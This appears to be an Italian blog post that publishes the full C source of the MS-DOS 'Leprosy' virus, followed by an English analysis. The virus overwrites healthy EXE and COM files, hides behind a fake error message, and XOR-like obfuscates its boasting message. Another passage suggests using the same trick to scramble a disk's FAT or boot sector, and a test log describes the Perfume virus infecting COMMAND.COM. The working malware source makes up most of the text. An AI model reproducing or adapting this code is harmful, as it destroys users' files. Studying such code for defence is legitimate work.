Salve a tutti oggi dopo tanto tempo riguardando alle categorie e ai tag disponibili ho notato che parlo pochissimo di virus questo anche perche la gente crede che sia il solito virus fasullo che non fa altro che spegnere il pc beh, oggi non è cosi quello che postero è il codice sorgente di un virus che funzionava sotto MS-DOS e molto probabilmente potrebbe funzionare anche su Windows 95 e 98 ma su xp di sicuro NO
Comunque iniziamo,
Il virus che trovate qui ha il nome di “Leprosy Virus” l’intero codice è scritto in C puro se volete provarlo consiglio di creare una macchina virtuale in questo articolo non starò ad analizzare il codice, cercate di capirlo tramite i commenti e leggendolo più volte.A mio parere trovo che il codice non sia molto difficile per quanto riguarda la comprensione.
Sorgente
[sourcecode language=” C “]
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );
/*———————————-*/
/* M A I N P R O G R A M */
/*———————————-*/
int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain’t a file here… */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we’ve had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed ‘em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it’s healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it’s healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}
int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* ‘Find first’ DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* ‘Find next’ function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
</p>
<p>
Metodo di infezione
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
</p>
<p>
void infection
void infect( void ) is just what he named this function.
_dta structure:
struct _dta
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80;
</p>
<p>
Next in the "infect" function, 0x00 is assigned to the CX register.
With function 43H in assembly, register CX is assigned with the bit of the
attribute that you want to set the file to.
Bit: Attribute:
0 Read Only
1 Hidden
2 System
3-4 Reserved
5 Archive
6-15 Reserved
Because the author assigned 0x00 to CX, none of the above attributes were set
on the file, allowing it to be written to.
Next in the "infect" function is 0x01 being assigned to register AL
0x01 is telling the program we want to SET attributes.
Then following that is: 0x43 being assigned to AH
Which is telling the program we want to use function 43H (Get/Set Attributes)
The current handle is assigned to register BX
The size of the virus code, or the number of bytes to write, stored in the
integer "virus_size" is assigned to register CX
virus_size is declared and initialized at the beginning of the source code
as a integer with the value "666"
Then the virus code is written to the file, the file is closed and the
original date and time the file had are restored.
—————————————————————————–
The Method Of Encryption:
—————————————————————————–
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
—————————————————————————–
The above function used in "Leprosy", called "print_s" accepts one parameter,
a string of text, like these ones defined at the beginning of the Leprosy
source code:
—————————————————————————–
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
—————————————————————————–
Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17
being the hexadecimal code for a carriage return and \x14 the code for a line
feed.
—————————————————————————–
When a string is passed to the "print_s" function, it is un-encrypted.
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
would result in the following being printed to the screen:
————————————————————
NEWS FLASH!! Your system has been infected with the
incurable decay of LEPROSY 1.00, a virus invented by
PCM2 in June of 1990. Good luck!
———————————————————–
The compiler I currently use does not accept inline assembly
code as the author of leprosy had in his source so I modified
the "print_s" function so I could compile it:
For those interested, I use Microsoft Quick C (C) Microsoft
———————————————————–
/* NOTE: I removed the . from the end of each message because that is */
/* A $ when un-encrypted, and the $ to terminate the string is only */
/* required for the assembly version of the "print_s" function */
/* Also: The hexadecimal constants in the strings are as follows: */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */
#
include <stdio.h>
#define CRLF "\x17\x14"
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
CRLF "
\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};
void print_s (char *s);
int main (void);
main()
{
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
}
void print_s (char *s) {
char *p = s;
while ( *p ) {
*p -= 10;
p++;
}
printf("%s\n",s);
}
—————————————————————————–
*p -= 10; is what does it all. It adds the value of 10 to each character and
can be used either way, to unencrypt or to encrypt.
if you change it to: *p += 10;
it will then encrypt.
You can also change it to:
*p -= rand() % 35000; /* #include <stdio.h> for "rand()" */
and it will change the value it uses to encrypt or un-encrypt everytime it
passes through the "while" loop or you can change it to any value you like.
—————————————————————————–
This method of encryption can be used to encrypt files, file allocation
tables, boot sectors, etc. All you need is a function that reads and writes
either of the three. For instance, read the contents of the File Allocation
Table, and pass the string(s) through the print_s function and then write
the encrypted string(s) back to the File Allocation Table. I don’t suggest
doing this to your hard drive, or anyone elses, for it will result in either
you or the other person having to crack the encryption and restore the FAT
manually, or formatting the hard drive and replacing all the files. If you
want to experiment, do it on a floppy, like I did.
</p>
<p>
cosa serve al virus per funzionare
I run a virus
on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file
and a few other assorted files on it.
The virus of the month award goes to: The Perfume Virus
—————————————————————————–
What Happened:
—————————————————————————–
Filename: PERFUME.COM Filesize: 806 bytes
Ok, I placed this file on drive B with the following files:
Filename: Original Size:
———————————-
COMMAND.COM 47845
MSDOS.SYS 37394
IO.SYS 33430
ANSI.SYS 9029
RAMDRIVE.SYS 5873
CONFIG.SYS 39
UNDELETE.EXE 13924
AUTOEXEC.BAT 69
15ALL05.DEF 67278
MICHEL.DEF 456
NSETUP.OVL 876
PKUNZIP.EXE 23528
———————————-
When I ran PERFUME.COM, it displayed the message: This is a tiny COM program.
and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes.
It then proceeded to remove the hidden/system attribute from MSDOS.SYS but
didn’t infect it and then attempted to infect the disk in drive A, which was
write protected at the time. The virus, realizing it couldn’t write to drive
A, displayed the message:
Not ready reading drive A
Insert disk with \COMMAND.COM in drive A
Press any key to continue . . .
Now, usually when DOS displays that message, it only needs to READ, and still
could’ve if the disk was write protected, so evidently the virus was
trying to outsmart me and fool me into thinking that was a DOS message so it
could infect at least one more disk.
I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory
so I re-booted and ran NAV again, this time it didn’t report the virus being
in memory, but did identify COMMAND.COM and PERFUME.COM as being infected.
[/sourcecode]
PS il odice riportato sopra non è stato modificato percio se compilato in modo corretto il virus potrebbe rimanere inattivo ma potrebbe non avere probemi sull’esecuzione sopratutto se trova i file elencati inoltre per compilarlo bisogna trovare programmi che compilano rilasciando un eseguibile .COM Fate buon uso di questo sorgente cerate di studiarlo per capire il suo funzionamento senza usarlo realmente e se proprio dovete usatelo su una macchina virtuale in modo da non causare danni oltretutto non fate i leemer.
Il codice sorgente non è di mia proprietà intelletuale perciò non spacciatelo per vostro.
